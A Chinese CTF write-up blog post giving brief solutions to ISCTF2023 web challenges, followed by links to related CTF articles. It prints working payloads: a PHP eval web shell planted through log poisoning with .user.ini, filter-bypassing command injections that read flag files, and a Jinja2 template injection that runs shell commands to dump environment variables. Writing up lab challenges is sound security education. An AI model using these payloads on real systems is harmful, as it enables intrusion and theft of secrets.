[WP] ISCTF2023 Web 部分题解

圣杯战争!!!

反序列化+伪协议读取

where_is_the_flag

环境变量+根目录+当前目录

绕进你的心里

利用正则最大回溯绕过

easy_website

or select 用双写绕过 空格用/**/绕,报错注入

wafr

code=system('ca\t /f*')

webinclude

扫描得到index.bak备份文件打开为加密的代码 写个逆向脚本再反求parameter即可

复制代码
JavaScript
const hash = 'dxdydxdudxdtdxeadxekdxea';

function string_to_int_array(str) {
  const intArr = [];
  for (let i = 0; i < str.length; i++) {
    intArr.push(str.charCodeAt(i) - 97);
  }
  return intArr;
}

function int_array_to_string(int_array) {
  let str = '';
  for (let i = 0; i < int_array.length; i += 2) {
    const charcode = int_array[i] * 26 + int_array[i + 1];
    str += String.fromCharCode(charcode);
  }
  return str;
}

console.log(int_array_to_string(string_to_int_array(int_array_to_string(string_to_int_array(hash)))));

得到参数名 直接伪协议读取flag.php

ez_ini

ini文件上传 +UA头添加木马

.user.ini 文件:

复制代码
GIF89A
auto_append_file="/var/log/nginx/access.log"

木马:

复制代码
<?php @eval($_POST['wenda']);?

然后远程命令执行就行了

复制代码
POST:

wenda=system('tac /flag');

注意一下上传ini文件的时候 type类型要改成image/jpeg 或者/image/png 类型】

或者直接ini 文件直接读取file:///flag 就行

复制代码
auto_prepend_file=file:///flag

fuzz!

通配符【】绕过 字符过滤 管道符| 拼接命令

复制代码
?file=|tac /fl[a-z]ggggggg.txt

恐怖 G7

ssti注入:

复制代码
{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}
相关推荐
Pure_White_Sword7 小时前
bugku-reverse题目-NoString
网络安全·ctf·reverse·逆向工程
饮长安千年月11 小时前
玄机-工控题
ctf·s7·流量分析·西门子协议
饮长安千年月2 天前
一带一路暨金砖国家技能发展与技术创新大赛网络安全防护与治理-Win基线加固
网络安全·ctf·金砖国家技能发展与技术创新大赛·一带一路
饮长安千年月2 天前
一带一路暨金砖国家技能发展与技术创新大赛网络安全防护与治理-Linux 安全基线加固
web安全·ctf·金砖国家技能发展与技术创新大赛·网络安全防护与治理
饮长安千年月2 天前
一带一路暨金砖国家技能发展与技术创新大赛网络安全防护与治理-Linux应急响应手册
linux·运维·web安全·ctf·应急响应
Jerry_Gao9212 天前
【CTF】【ez-upload】FrankenPHP(v1.11.1)Unicode路径解析漏洞
安全·php·ctf·frankenphp
Jerry_Gao9213 天前
【CTF】【ez-rce】无字母数字绕过正则表达式
正则表达式·php·ctf
Jerry_Gao9214 天前
【CTF】【ez-inject】通过协议层Length字段的溢出进行注入
网络安全·ctf
unable code4 天前
流量包取证-大流量分析
网络安全·ctf·misc·1024程序员节·流量包取证
unable code5 天前
浏览器取证-[GKCTF 2021]FireFox Forensics
网络安全·ctf·misc·1024程序员节·浏览器取证